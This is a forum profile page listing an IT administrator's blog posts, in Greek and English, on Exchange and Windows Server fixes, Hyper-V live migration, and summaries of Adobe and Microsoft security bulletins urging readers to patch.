Jump to content

Ioannis Zontos

Members
 View Profile  See their activity

  • Posts

    181

  • Joined

  • Last visited

 Content Type 

Blog Entries posted by Ioannis Zontos

  1. Ioannis Zontos
    Το πρόβλημα που υπάρχει στην Exchange Management Console (EMC) στον Microsoft Exchange 2007-2010 με τον Internet Explorer 9 is installed πλέον μπορεί να λυθεί με hot fix που δεν είναι ακόμα διαθέσιμο για public download και αυτό γιατί θα είναι ενσωματωμένο σε επόμενο roll up . Το πρόβλημα εμφανιζόταν με το έξης μήνυμα

    Exchange 2007 or 2010 EMC might fail to close with "You must close all dialog boxes before you can close Exchange Management Console"

    Για να λυθεί το πρόβλημα

    Θα πρέπει πρώτα να εγκαταστήσουμε την released version of IE9 στο μηχάνημα που έχουμε τον Microsoft Exchange 2007-2010 . Στην συνέχεια θα πρέπει να εγκαταστήσουμε

    MS11-081: Cumulative Security Update for Internet Explorer: October 11, 2011

    Αυτό το βρίσκουμε από το Windows Update or – αν θέλουμε να το κατεβάσουμε και να το έχουμε στο local network το πακέτο το βρίσκουμε here.

    Please note that the packages for client and server OSes might be different, depending on what you need. The installation of this package is REQUIRED for proper operation of the EMC hotfix.

    Μπορούμε να καλέσουμε το support της Microsoft και να ζητήσουμε το hotfix , αν ζητήσουμε το hotfix θα πρέπει να ζητήσουμε το KB 2624899.(το όποιο δεν είναι άρθρο που είναι διαθέσιμο publicly )



    Πως βρίσκω  call support?

    Ανάλογα με την Περιοχή που είμαστε θα πάμε here.

    Γιατί αυτό το hot fix δεν είναι διαθέσιμο για public download? (από το Exchange Team Blog η απάντηση )

    It's planned that this fix will be rolled into a version of Internet Explorer or a fix that will be released at a later time. Due to the amount of feedback we've received about this issue, we wanted to give you a way to resolve this problem right now, if you are impacted by it. Individual hotfix packages such as this one do not go through as extensive testing as our roll-up fixes and therefore we want to have a way to reach out to customers who use it in case there's a problem that is identified with it at a later time.

    Finally, I would like to thank the Internet Explorer team for working with us on this interoperability issue and producing this hotfix.




     


  2. Ioannis Zontos
    Severity: High
    Summary:
    · These vulnerabilities affect: Adobe Shockwave Player, Flash Player, Flash Media Server, and Photoshop
    · How an attacker exploits them: Multiple vectors of attack, including enticing your users to open malicious files or visit specially crafted web sites
    · Impact: Various results; in the worst case, an attacker can gain complete control of your computer
    · What to do: Install the appropriate Adobe patches immediately, or let Adobe's updater do it for you.
    Exposure:
    Yesterday, Adobe released five security bulletins describing vulnerabilities in many of their popular software packages, including Shockwave Player, Flash Player, Flash Media Server, Photoshop, and Robohelp. A remote attacker could exploit the worst of these flaws to gain complete control of your computer. The summary below details some of the vulnerabilities in these popular software packages.
    · APSB11-19: Seven Shockwave Player Vulnerabilities
    Adobe Shockwave Player displays interactive, animated web content and movies called Shockwave. According to Adobe, the Shockwave Player is installed on some 450 million PCs.
    Adobe’s bulletin warns of seven security vulnerabilities that affect Shockwave Player 11.6.0.626 and earlier for Windows and Macintosh (as well as all earlier versions). Adobe’s bulletin doesn’t describe the flaws in much technical detail. It only describes the nature and basic impact of each flaw. For the most part, the flaws consist of unspecified memory corruption vulnerabilities. Though these flaws differ technically, most of them share the same general scope and impact. If an attacker can entice one of your users into visiting a website containing some sort of malicious Shockwave content, he could exploit many of these vulnerabilities to execute code on that user’s computer, with that user’s privileges. If your Windows users have local administrator privileges, an attacker could exploit this flaw to gain full control of their PC.
    Adobe Severity: Critical
    · APSB11-20: Flash Media Server DoS Vulnerability
    Adobe Flash Player displays interactive, animated web content called Flash. Flash Media Server allows administrators to stream Flash content.
    Flash Media Server 4.0.2 and earlier suffer from an unspecified Denial of Service (DoS) vulnerability. Adobe does not share any relevant detail about this flaw, including no detail on how an attacker might exploit it. They only share that an attacker could somehow exploit the flaw to launch a DoS attack against your media server. 
    Adobe Severity: Critical
    · APSB11-21 : Flash Player Update Corrects 13 Security Flaws
    Adobe Flash Player displays interactive, animated web content called Flash. A recent report from Secunia stats that 99% of Windows computers have Adobe Flash Player installed, so you users very likely have it.
    Adobe’s update fixes 13 security vulnerabilities in Flash Player (for Windows, Mac, Linux, and Solaris), which they don’t describe in much technical detail. However, they do describe the general scope and impact of these flaws. In the worst case, if an attacker can lure one of your users to a malicious website, they could exploit some of these flaws to gain control of that user’s computer. We assume the attacker would only gain the privileges of the logged in user. However, since most Windows users have local administrator privileges, the attacker would likely gain full control of Windows machines.
    Adobe Severity: Critical
    · APSB11-22: Photoshop GIF Handling Vulnerability
    Photoshop is a popular image editing program. Photoshop CS5 suffers from an unspecified vulnerability involving its inability to properly handle specially crafted GIF images. If an attacker can trick you into downloading and opening a malicious GIF image in Photoshop, she can exploit this flaw to execute code on your machine, with your privileges. If you have local admin privileges, the attacker gains complete control of your computer.
    Adobe Severity: Critical
    · APSB11-23: RoboHelp XSS Flaw
    RoboHelp 9 is software that helps you create help systems. It suffers from an unspecified Cross-Site Scripting (XSS)  vulnerability. By enticing one of your users into clicking a specially crafted link, an attacker could run script on that users computer under the context of the Robohelp component. 
    Adobe Severity: Important.
    Solution Path:
    Adobe has released updates for all their affected software. If you use any of the software below, we recommend you download and deploy the corresponding updates as soon as possible, or let Adobe’s automatic updater do it for you:
    · APSB11-19: Upgrade to Shockwave 11.6.1.629
    · APSB11-20: Upgrade to Flash Media Server 4.0.3 or 3.5.7
    · APSB11-21: Upgrade to Flash Player 10.3.183.5
    · APSB11-22:
    o Photoshop CS5 for Windows
    o Photoshop CS5 for Windows x64

    o Photoshop CS5 for Mac

    · APSB11-23: Upgrade RoboHelp 8 and 9:
    o RoboHelp 8
    o RoboHelp 9
    Status:
    Adobe  has released patches correcting these issues.
    References:
    o Adobe Security Update APSB11-19
    o Adobe Security Update APSB11-20
    o Adobe Security Update APSB11-21
    o Adobe Security Update APSB11-22
    o Adobe Security Update APSB11-23
  3. Ioannis Zontos
    According to ComputerWorld and Symantec, Attackers are currently leveraging a zero day vulnerability in Adobe Reader in targeted attacks against telecommunications, manufacturing, computer hardware, and chemical companies, as well as defence sector organisations like Lockheed Martin.

    The attacks may have started as early as the beginning of November, and arrive as a targeted phishing email with a malicious PDF attachment. If you open said attachment, your computer gets infected with information stealing malware.

    Earlier this weak, Adobe confirmed this zero day flaw in a Security Advisory. The vulnerability affects all current versions of Reader and Acrobat running on any platform. Though they have not released a fix for the flaw yet, they plan to sometime next week.

    Until then, we highly recommend that you inform your users to be very careful handling PDF files that come from outside your organization, whether from a trusted source or not. If you have one of our security appliances, you can also use our proxy policies to strip all PDF content if you like. That said, doing so blocks both legitimate and malicious PDF files. Also, be sure to keep both your gateway and client level antivirus software up to date, as it likely has signatures to block known variants of this attack.




     


  4. Ioannis Zontos
    Τα τελευταία χρόνια, πολλές ιστοσελίδες βρίσκονται σε ομηρία, και παγιδευμένες με κακόβουλο κώδικα.
    Εάν επισκεφθείτε μια τέτοια ιστοσελίδα με unpatched σύστημα, ο υπολογιστής σας μπορεί αυτόματα και σιωπηλά κατεβάσει και να εγκαταστήσει κάποιο malware. Τον τελευταίο καιρό, οι εισβολείς έχουν καταφέρει καιι  έχουν χτυπήσει χιλιάδες ιστοσελίδες με τη μία. Τι φταίει για αυτές τις μαζικές επιθέσεις και πως γίνονται ; Τις περισσότερες φορές με Αυτοματοποιημένη SQL Injection (SQLi).
    Σύμφωνα με τους ερευνητές στο SANS, ένα αυτοματοποιημένο συστημα εισαγωγής SQL (SQLi) που ονομάστηκε Lilupophilupop έχει μολύνει πάνω από ένα εκατομμύριο ιστοσελίδες Αυτή η τελευταία περίοδος των αυτοματοποιημένων επιθέσεων SQLi εχει στόχους web server της Microsoft (IIS servers με ASP.NET, και MSSQL backend), και εμφανίστηκε πρώτα στις αρχές Δεκεμβρίου. Τότε, η επίθεση είχε επηρεάσει λιγους server . Ωστόσο, πρόσφατη έρευνα SANS »δείχνει ότι έχει εξαπλωθεί σε μόλις πάνω από ένα εκατομμύριο ιστοσελίδες σήμερα.
    Αν θέλετε να μάθετε περισσότερα για αυτήν την επίθεση, μπορείτε να βρείτε λεπτομέρειες σχετικά  SANS’ early December post.
    Ένα μικρό βίντεο για μια απλή επίθεση με sql injection στην συνέχεια
     
  5. Ioannis Zontos
    Summary:
    · These vulnerabilities affect: All current versions of Windows and components that ship with it
    · How an attacker exploits them: Multiple vectors of attack, including sending specially crafted network packets, enticing your users to open malicious files, or running malicious applications locally
    · Impact: Various results; in the worst case, an attacker can gain complete control of your Windows computer
    · What to do: Install the appropriate Microsoft patches immediately, or let Windows Automatic Update do it for you.
    Exposure:
    Yesterday, Microsoft released six security bulletins describing seven vulnerabilities that affect Windows and components that ship with it. Each vulnerability affects different versions of Windows to varying degrees. However, a remote attacker could exploit the worst of these flaws to gain complete control of your Windows PC. The summary below lists the vulnerabilities, in order from highest to lowest severity.
    · MS11-059: Data Access Components Code Execution Vulnerability
    According to Microsoft, Windows Data Access Components (Windows DAC) help provide access to information across an enterprise. Unfortunately, Windows DAC allows unrestricted access to the loading of external libraries. By enticing one of your users to open a specially crafted Excel file residing in the same location as a malicious DLL file, an attacker could exploit this flaw to execute code on that user's system, with that users privileges. If your users have local administrative privileges, the attacker gains complete control of their machine. This flaw only affects Windows 7 and later.
    Microsoft rating: Important.
    · MS11-061: Remote Desktop Web Access XSS Vulnerability
    Windows Remote Desktop (RD) allows you to gain network access to your Windows desktop from anywhere. The Web Access component provides this capability through a web browser. Unfortunately, the RD Web Access component suffers from a Cross-Site Scripting (XSS)  vulnerability. By enticing one of your users into clicking a specially crafted link, an attacker could run script on that users computer under the context of the RD Web Access component, potentially giving the attacker access to your remote desktop. This flaw only affects Windows Server 2008 R2 x64.
    Microsoft rating: Important.
    · MS11-062: RAS NDISTAPI Driver Elevation of Privilege Vulnerability
    Remote Access Service (RAS) is a component that allows you to access networks over phone lines, and the NDISTAPI driver is one of the RAS components that helps provide this functionality. The NDISTAPI driver doesn't properly validate users input that it passes to the Windows kernel. By running a specially crafted application, an attacker can leverage this flaw to elevate his privilege, gaining complete control of your Windows machine. However, the attacker would first need to gain local access to your Windows computers using valid credentials, in order to run his special program. This factor significantly reduces the risk of this flaw. Finally, this flaw only affects XP and Server 2003.
    Microsoft rating: Important.
    · MS11-063: CSRSS Elevation of Privilege Vulnerability
    The Client/Server Run-time SubSystem (CSRSS) is an essential Windows component responsible for console windows and creating and deleting threads. It suffers from a Elevation of Privilege (EoP) vulnerability. Like the NDISTAPI driver flaw above, by running a specially crafted program, an authenticated attacker could leverage these flaws to gain complete, SYSTEM-level  control of your Windows computers. However, like before, the attacker would first need to gain local access to your Windows computers using valid credentials, which somewhat reduces the risk of these flaws.
    Microsoft rating: Important.
    · MS11-064: TCP/IP Stack DoS Vulnerabilities
    The Windows TCP/IP stack provides IP-based network connectivity to your computer. It suffers from two Denial of Service (DoS) vulnerabilities. On of the flaws is a variant of the very old Ping of Death vulnerability. By sending a specially crafted ICMP message, an attacker can cause your system to stop responding or reboot. Most firewalls, including WatchGuard's XTM appliances, prevent external exploit of this classic DoS flaw. The second flaw has to do with how the TCP/IP stack handles specially crafted URLs. By sending a specially crafted URL to one of your Windows Web servers, an attacker could exploit this flaw to cause the server to lock up or reboot. These flaws only affect Windows Vista and later.
    Microsoft rating: Important.
    · MS11-068: Windows Kernel DoS Vulnerability
    The kernel is the core component of any computer operating system. The Windows kernel suffers from a Denial of Service (DoS) vulnerability, involving a flaw in the way it parses metadata in files. By running a specially crafted program, an attacker could leverage this flaw to gain complete control of your Windows computers. However, the attacker would first need to gain local access to your Windows computers using valid credentials. This factor significantly reduces the risk of these flaws. This flaw only affect Windows Vista and later.
    Microsoft rating:Moderate.
    Solution Path:
    Microsoft has released patches for Windows which correct all of these vulnerabilities. You should download, test, and deploy the appropriate patches throughout your network immediately. If you choose, you can also let Windows Update automatically download and install these for you.
    MS11-059:
    · For Windows 7 (w/SP1)
    · For Windows 7 x64 (w/SP1)
    · For Windows Server 2008 R2 x64 (w/SP1)
    · For Windows Server 2008 R2 Itanium (w/SP1)
    MS11-061:
    · For Windows Server 2008 R2 x64
    MS11-062:
    · For Windows XP (w/SP3)
    · For Windows XP x64 (w/SP2)
    · For Windows Server 2003 (w/SP2)
    · For Windows Server 2003 x64 (w/SP2)
    · For Windows Server 2003 Itanium (w/SP2)
    MS11-063:
    · For Windows XP (w/SP3)
    · For Windows XP x64 (w/SP2)
    · For Windows Server 2003 (w/SP2)
    · For Windows Server 2003 x64 (w/SP2)
    · For Windows Server 2003 Itanium (w/SP2)
    · For Windows Vista (w/SP2)
    · For Windows Vista x64 (w/SP2)
    · For Windows Server 2008 (w/SP2)
    · For Windows Server 2008 x64 (w/SP2)
    · For Windows Server 2008 Itanium (w/SP2)
    · For Windows 7 (w/SP1)
    · For Windows 7 x64 (w/SP1)
    · For Windows Server 2008 R2 x64 (w/SP1)
    · For Windows Server 2008 R2 Itanium (w/SP1)
    MS11-064:
    · For Windows Vista (w/SP2)
    · For Windows Vista x64 (w/SP2)
    · For Windows Server 2008 (w/SP2)
    · For Windows Server 2008 x64 (w/SP2)
    · For Windows Server 2008 Itanium (w/SP2)
    · For Windows 7 (w/SP1)
    · For Windows 7 x64 (w/SP1)
    · For Windows Server 2008 R2 x64 (w/SP1)
    · For Windows Server 2008 R2 Itanium (w/SP1)
    MS11-068:
    · For Windows Vista (w/SP2)
    · For Windows Vista x64 (w/SP2)
    · For Windows Server 2008 (w/SP2)
    · For Windows Server 2008 x64 (w/SP2)
    · For Windows Server 2008 Itanium (w/SP2)
    · For Windows 7 (w/SP1)
    · For Windows 7 x64 (w/SP1)
    · For Windows Server 2008 R2 x64 (w/SP1)
    · For Windows Server 2008 R2 Itanium (w/SP1)
  6. Ioannis Zontos
    Μετά την εγκατάσταση του Microsoft Exchange 2007 service pack 3, η rollup #1 η rollup #2 αν προσπαθήσουμε να φτιάξουμε ένα νέο receive connector θα έχουμε το έξης λάθος error:
    Summary: 1 item(s). 0 succeeded, 1 failed.
    Elapsed time: 00:00:00
    test
    Failed
    Error:
    Active Directory operation failed on SBS01.ks.local. This error is not retriable. Additional information: The parameter is incorrect.
    Active directory response: 00000057: LdapErr: DSID-0C090C26, comment: Error in attribute conversion operation, data 0, v1772
    The requested attribute does not exist.
    Exchange Management Shell command attempted:
    new-ReceiveConnector -Name ‘test’ -Usage ‘Custom’ -Bindings ’0.0.0.0:25′ -Fqdn ‘test.test.com’ -RemoteIPRanges ’0.0.0.0-255.255.255.255′ -Server ‘SBS01′
    Elapsed Time: 00:00:00

    Παρατήρηση :: Οι παλιοί connectors που έχουμε λειτουργούν μια χαρά και δεν έχουν πρόβλημα , μόνο στην δημιουργία νέου , η σε τυχόν απόπειρα να κάνουμε edit σε υπάρχον connector εμφανίζετε το πρόβλημα για αυτό ενδέχεται να έχετε περάσει το SP3 και τα rollup χωρίς να έχει εντοπιστεί το πρόβλημα

    Το πρόβλημα αυτό εμφανίζετε γιατί κατά την αυτόματη εγκατάσταση του SP3 δεν έγινε πρώτα η προετοιμασία του σχήματος , όπως ΑΝΑΦΕΡΕΤΑΙ στο Microsoft TechNet site http://technet.microsoft.com/en-us/library/ff607233(EXCHG.80).aspx
    Θα πρέπει πρώτα να γίνει η προετοιμασία του Active Directory για κάθε domain πριν προχωρήσουμε στην εγκατάσταση του Exchange 2007 SP3 -. “This process includes updating the Active Directory schema for Exchange 2007 SP3″
    Για να επιλύσουμε το πρόβλημα χρειαζόμαστε το αποσυμπιεσμένο SP3 , αν δεν το έχουμε το βρίσκουμε στο
    http://www.microsoft.com/downloads/en/details.aspx?FamilyID=1687160b-634a-43cb-a65a-f355cff0afa6&displaylang=en
    Μόλις το αποσυμπιέσουμε ανοίγουμε ένα command prompt ,πάμε στο φάκελο που το αποσυμπιέσαμε και εκτελούμε την εντολή Setup.com /PrepareSchema


    Μόλις ολοκληρωθεί το preparations του schema είμαστε έτοιμη και μπορούμε να δημιουργήσουμε τους connector που θέλουμε χωρίς κανένα πρόβλημα


  7. Ioannis Zontos
    Για να αλλάξουμε το client time-out για το Remote Web Workplace ( το default = 30 minutes)
    1. Ανοίγουμε τον Registry Editor.
    2. Βρίσκουμε το :
    HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SmallBusinessServer\
    \RemoteUserPortal
    αν δεν υπαρχει το RemoteUserPortal το δημιουργούμε !!!
    3. Φτιάχνουμε ένα DWORD (32-bit) value με όνομα PublicTimeOut
    4. Στο Value data Βάζουμε τα min που θέλουμε να μας κάνει to Remote Web Workplace session times out
    Σημαντικό που θέλει προσοχή :
     Αυτό που θα βάλουμε θα πρέπει να μην είναι μεγαλύτερο από 1440 Decimal (5a0 Hex).
    Αν είναι δεν θα δουλεύει καλά !!!
    5. Πατάμε OK.
    Για να αλλάξουμε το server time-out για το Remote Web Workplace (default = 20 minutes)
    1. Πάμε στον Windows SBS 2008 server, --> Start-->Administrative Tools,
    -->Information Services (IIS) Manager.
    2. User Account Control prompt, πατάμε συνεχεία (αν το έχετε enable που πρέπει να το έχετε )
    3. Αριστερα διπλο  double-click στο onoma tou server
    4. Διπλό κλικ στα Sites για αν γίνει expand iκαι μετά Διπλό κλικ στο SBS Web Applications
    5. Στο SBS Web Applications Home, Διπλό κλικ στο Session State.
    6. Στο Cookie Settings, αλλάζουμε το Time-out (in minutes)
    7. Τέλος πατάμε ΟΚ για αν σώσουμε τις αλλαγές μας
    Αν το client timeout value είναι μεγαλύτερο από το server timeout value:
    Η RWW page θα μας κάνει will log you off μετα το client timeout value και θα μας γυρίσει στο RWW logon page χωρίς κάποιο άλλο μήνυμα, Αν ανοίξουμε το OWA από το link που έχουμε στο RWW, το OWA page επίσης θα μας κάνει logged off και θα μας γυρίσει στο OWA logon page όταν πάμε να κλικαρουμε οτιδήποτε μέσα στο OWA. Αν το client timeout value είναι ισο η μικρότερο από το server timeout value:
    Η RWW page θα μας κάνει will log you off βασιζόμενη στο client timeout value και θα έχουμε μήνυμα στην οθόνη μας όπως .
    Αν έχουμε ανοίξει το OWA από το link που έχουμε στο RWW, τότε το OWA θα παραμείνει ανοιχτό μέχρι το δικό του timeout που είναι 15 minutes). Για πληροφορίες για το OWA idle timeout μπορούμε να δούμε στο TechNet:
    OWA Public TimeOut (default is 15 minutes) OWA Private TimeOut (default is 8 hours)
  8. Ioannis Zontos
    Στον Windows Server 2012, ένα από τα νέα χαρακτηριστικά του Hyper-V είναι το Live Migration without Shared Storage. Όπως προηγούμενη έκδοση, Live Migration απαιτεί ένα cluster shared storage and cluster settings. Τώρα, μπορείτε να μετακινήσετε VMs από 1 Hyper-V server σε άλλες Hyper-V servers χωρίς cluster shared storage and cluster settings.
    θα δούμε πως μπορούμε να έχουμε Live Migration without shared storage.
    Prerequisites
    Πρέπει και οι δυο Hyper-V servers να είναι joined στο ιδιο Active Directory domain. Για να πετυχουμε το live migration, πρεπει το user account να είναι member στους Domain Administrator Group environment
    Θέλουμε 1 domain controller, με ονομα DC01, for "test.company.com" Έχουμε 2 Hyper-V, named "HVSVR01" and "HVSVR02" που είναι joined "test.company.com" domain. Kαι οι Hyper-V servers έχουν 2 network cards με 10.0.0.0 /8 domain network και 172.16.0.0./16 Live migration network. 1 VM, για το τεστ named is located on HVSVR01. Εχουμε 2 virtual switches, "HVSVR01-Switch" & "HVSVR02-Switch". "HVSVR01-Switch" is configured on HVSVR01 "HVSVR02-Switch" is configured on HVSVR02. Configure Kerberos authenticate and live migration network for the Hyper-V Servers
    Το Live migration στον Windows Server 2012 υποστηρίζει 2 authentication protocol, "CredSSP" and "Kerberos".
    By default, Hyper-V servers use "CredSSP"
    Για να χρησιμοποιήσουμε Kerberos authentication, πρέπει να έχουμε configure Kerberos delegation on the servers.
    1. On DC01, log in as Domain Administrator.
    2. Launch "Active Directory Users and Computers".
    3. ΠΑμε στο domain μας "test.company.com > και μετα στα computer".

    4. Δεξί κλικ "HVSVR01", –> "Properties".
    5. Επιλέγουμε "Delegation" tab.
    6. Επιλέγουμε "Trust this computer delegation to specified services only > Use Kerberos only".
    7. κλικ "Add".
    8. Κλικ "Users or Computers".
    9. Enter "HVSVR02".

    10. Επιλέγουμε "cifs" and "Microsoft Virtual System Migration Service".
    11. Κλικ "OK".

    12. Κλικ "OK".
    13. Επαναλαμβάνουμε τα βήματα 4 - 12 και στον άλλον server HVSVR02.

    14. Κλείνουμε "Active Directory Users and Computers". και
    15. Πάμε στον HVSVR01, και κάνουμε log σαν Domain Administrator.
    16. Επιλέγουμε "Hyper-V Manager".
    17. Πάμε "Hyper-V Settings".

    18. Επιλέγουμε "Live Migrations".
    19. Τσεκάρουμε "Enable incoming and outgoing live migrations".
    20. Πάμε στο "Authentication protocol", και επιλέγουμε "Use Kerberos".
    21. Πάμε "Incoming live migrations", επιλέγουμε "Use these IP addresses for live migration".
    22. Κλικ "Add".
    23. "IP Address", δίνουμε "172.16.0.0/16".

    24 .ok

    24. Click "OK".

    κανονικά για το live migration πρέπει να εχουμε ξεχωριστές κάρτες και ξεχωριστό δίκτυο και στους δυο servers
    αλλα μπορούμε να χρησιμοποιήσουμε και το domain network
    25. κλικ "OK".
    26. Επαναλαμβάνουμε τα βήματα 16 - 25 on HVSVR02.
    Μεταφορά του VM
    1. Στον "Hyper-V Manager" of HVSVR01, δεξι κλικ "FS01.test.company.com".
    2. Επιλέγουμε "Move".


    5. klik "Next".
    6. Στο "Specify Destination" screen, μετα το "Name", βαζουμε "HVSVR02".

    7. Click "Next".
    8. Στο "Choose Move Options" επιλεγουμε "Move the virtual machine's data to a single location".

    9.Επιλεγουμε τα network switch


    και έχουμε τελειώσει πολυ απλά και πολύ γρήγορα
  9. Ioannis Zontos
    ένα πολύ καλό video για την δημιουργία workflow με τον Orchestrator στον System Center 2012.
    Στο βίντεο βλέπουμε τα εξής
    Create a Orchestrator runbook that will: Receive data from Service Manager via the databus Get information about SQL Server Update an object in Service Manager Show exception handling of a process Launch a PowerShell script Return data from a .NET script Sync the runbook and connector with Service Manager Create a Service Manager activity template that can be called within a service request offering Create a request offering using the activity template http://technet.microsoft.com/en-us/video/private-cloud-demo-extravaganza-8-create-an-orchestrator-runbook-and-integrate-with-service-manager-with-system-center-2012
  10. Ioannis Zontos
    Summary:
    · These vulnerabilities affect: All current versions of Windows and components that ship with it (as well as some optional components like .NET Framework)
    · How an attacker exploits them: Multiple vectors of attack, including sending specially crafted network traffic or enticing your users to view malicious images
    · Impact: Various results; in the worst case, an attacker can gain complete control of your Windows computer
    · What to do: Install the appropriate Microsoft patches immediately, or let Windows Automatic Update do it for you.
    Exposure:
    Today, Microsoft released eleven security bulletins describing a dozen vulnerabilities that affect Windows and components that ship with it. Each vulnerability affects different versions of Windows to varying degrees. However, a remote attacker could exploit the worst of these flaws to gain complete control of your Windows PC. The summary below lists the vulnerabilities, in order from highest to lowest severity (according to Microsoft's summary).
    · MS11-038: OLE Automation Code Execution Vulnerability
    According to Microsoft, Object Linking and Embedding (OLE) Automation is a Windows protocol that allows an application to share data with or to control another application. Unfortunately, OLE Automation suffers from a vulnerability involving the way it parses specially crafted Windows MetaFile (WMF) images. By tricking a user into viewing a specially crafted image, perhaps hosted on a web site, an attacker could exploit this flaw to execute code with that user's privileges. If your users have local administrative privileges, the attacker gains complete control of their machines.
    Microsoft rating: Critical
    · MS11-039 & MS11-044 : Two .NET Framework Code Execution Vulnerabilities
    The .NET Framework is software framework used by developers to create new Windows and web applications. The .NET Framework (and SilverLight) suffers from two complex vulnerabilities having to do with how it validates parameters passed to network function, or how its JIT compiler validates values within objects. The scope and impact of these complex vulnerabilities differs depending on the attack vector. There are three potential vectors of attack: An attacker can host a malicious .NET web site; attack your .NET web site, or leverage one of your custom .NET applications to potentially elevate his privilege. We believe the malicious .NET web site poses the most risk. If an attacker can entice you to a specially crafted site (or to a legitimate site that somehow links to his malicious site), he can exploit this flaw to execute code on your computer, with your privileges. If you are a  local administrator, the attacker has full control of your machine. If you've installed .NET Framework, you should patch, even if you do not run custom .NET applications or web sites.
    Microsoft rating: Critical
    · MS11-041  Kernel-Mode Drivers Code Execution Vulnerability
    The kernel is the core component of any computer operating system. Windows also ships with a kernel-mode device driver (win32k.sys) which handles many kernel-level devices. This kernel-mode driver suffers from a code execution flaw involving the way it handles OpenType fonts on 64-bit systems. By enticing one of your users to view a specially crafted font, an attacker could exploit this flaw to gain full control of that user's computer (regardless of the user's privilege). However, the malicious font would have to reside on the local computer, or a network share in order for this attack to succeed. Again, the flaw only affects 64-bit versions of Windows.
    Microsoft rating: Critical
    · MS11-042 DFS Memory Corruption Vulnerability
    Microsoft's Distributed File System (DFS) is a collection of client and server services that allows you to create what appears to be a single file share, but actually consists of shares on multiple hosts. The Windows DFS service suffers from two security vulnerabilities. The worst is a memory corruption flaw that has to do with how the DFS client handles specially crafted DFS responses. By hosting a malicious server on your network, which sends specially crafted DFS responses to requesting clients, an attacker could exploit this memory corruption flaw to gain complete control of a Windows computer (or in some cases, just crash your computer). That said, most adminstrators do not allow DFS traffic past their firewall. So these vulnerabilites primarily pose an internal risk.
    Microsoft rating: Critical
    · MS11-043: SMB Client Code Execution Vulnerability
    Microsoft Server Message Block (SMB) is the protocol Windows uses for file and print sharing. According to Microsoft, the Windows SMB client suffers from a security vulnerability which attackers could leverage to execute malicious code. By enticing one of your users to connect to a malicious SMB server, or by sending a specially crafted SMB message in response to a legitimate local request, an attacker can exploit this flaw to gain complete control of a vulnerable Windows computer. However, firewalls like WatchGuard's XTM appliances typically block SMB traffic from the Internet, making these vulnerabilities primarily an internal risk. That said, many types of malware leverage SMB vulnerabilities to self-propagate within networks, once they infect their first victim.
    Microsoft rating: Critical
    · MS11-037: MHTML Information Disclosure Vulnerability
    In our February advanced notification post, we mentioned a zero day MHTML vulnerability that was similar to a Cross-site Scripting (XSS) vulnerability.The flaw involves the Windows MHTML or MIME HTML component, which is used to handle special web pages that include both HTML and MIME (typically pictures, audio, or video) content contained in one file. If an attacker can entice you to visit a specially crafted web-page, or click a malicious link, he could exploit this flaw in much the same way he might exploit a Cross-Site Scripting (XSS) vulnerability; to steal your cookies, redirect your browser to malicious sites, or essentially take any action you could on a web site. Last April, Microsoft supposedly fixed this flaw. However, their fix must not have been complete since this update fixes a new variant of essentially the same issue.
    Microsoft rating: Important.
    · MS11-046 AFD Elevation of Privilege Vulnerability
    The Ancillary Funtion Driver (AFD.sys) is driver that handles Winsock TCP/IP communications. This kernel-mode driver suffers from an elevation of privilege (EoP) vulnerability. By running a specially crafted program, a local attacker could leverage these flaws to gain complete control of your Windows computers. However, the attacker would first need to gain local access to your Windows computers using valid credentials. This factor significantly reduces the risk of this flaw.
    Microsoft rating: Important
    · MS11-047: Windows 2008 Hyper-V DoS Vulnerability
    Hyper-V is the hypervisor technology that Windows 2008 uses for virtualization. Hyper-V suffers from a Denial of Service (DoS) vulnerability having to do with how it handles specially crafted communications between a guest OS and the host OS. By running a specially crafted program within a guest OS, an attacker can exploit this flaw to cause a 2008 server to stop responding until you reboot it. However, the attacker needs administrative access on the guest OS in order to exloit this flaw. The flaw only affects 2008 servers.
    Microsoft rating: Important
    · MS11-048: SMB Server DoS Vulnerability
    The Windows SMB Server suffers from a Denial of Service (DoS) vulnerability having to do with how it handles specially crafted SMB requests. By sending a specially crafted SMB packet, an attacker can exploit this flaw to cause a Windows computer to stop responding until you rebooted it. Like the SMB client vulnerabilit mentioned before, this vulnerability primarily poses an internal risk since firewalls block SMB.
    Microsoft rating: Important
    · MS11-051 AD Certificate Services Web Enrollment EoP Vulnerability
    The Active Directory (AD) Certificates Services Web Enrollment site suffers from a Cross-site Scripting (XSS) vulnerability. By enticing one of your users to click a specially crafted link, an attacker could exploit this flaw to steal your cookies, redirect your browser to malicious sites, or essentially take any action you could on the AD Web Enrollment site. This flaw only affects the non-Itanium, server versions of Windows.
    Microsoft rating: Important
    Solution Path:
    Microsoft has released patches for Windows which correct all of these vulnerabilities. You should download, test, and deploy the appropriate patches throughout your network immediately. If you choose, you can also let Windows Update automatically download and install these for you.
    MS11-038:
    · For Windows XP (w/SP3)
    · For Windows XP x64 (w/SP2)
    · For Windows Server 2003 (w/SP2)
    · For Windows Server 2003 x64 (w/SP2)
    · For Windows Server 2003 Itanium (w/SP2)
    · For Windows Vista (w/SP1 or SP2)
    · For Windows Vista x64 (w/SP1 or SP2)
    · For Windows Server 2008 (w/SP2) *
    · For Windows Server 2008 x64 (w/SP2) *
    · For Windows Server 2008 Itanium (w/SP2)
    · For Windows 7
    · For Windows 7 x64
    · For Windows Server 2008 R2 x64 *
    · For Windows Server 2008 R2 Itanium
    * Note: Server Core installations not affected.
    MS11-039 & MS11-044:
    Due to the complicated, version-dependent nature of .NET Framework updates, we recommend you see the Affected & Non-Affected Software section of Microsoft's Bulletins for patch details (or let Windows Automatic Updates handle the patch for you).
    · MS11-039 Affected & Non-Affected Software section
    · MS11-044 Affected & Non-Affected Software section
    MS11-041:
    · For Windows XP x64 (w/SP2)
    · For Windows Server 2003 x64 (w/SP2)
    · For Windows Server 2003 Itanium (w/SP2)
    · For Windows Vista x64 (w/SP1 or SP2)
    · For Windows Server 2008 x64 (w/SP2)
    · For Windows Server 2008 Itanium (w/SP2)
    · For Windows 7 x64
    · For Windows Server 2008 R2 x64
    · For Windows Server 2008 R2 Itanium
    MS11-042:
    · For Windows XP (w/SP3)
    · For Windows XP x64 (w/SP2)
    · For Windows Server 2003 (w/SP2)
    · For Windows Server 2003 x64 (w/SP2)
    · For Windows Server 2003 Itanium (w/SP2)
    · For Windows Vista (w/SP1 or SP2)
    · For Windows Vista x64 (w/SP1 or SP2)
    · For Windows Server 2008 (w/SP2)
    · For Windows Server 2008 x64 (w/SP2)
    · For Windows Server 2008 Itanium (w/SP2)
    · For Windows 7
    · For Windows 7 x64
    · For Windows Server 2008 R2 x64
    · For Windows Server 2008 R2 Itanium
    MS11-043:
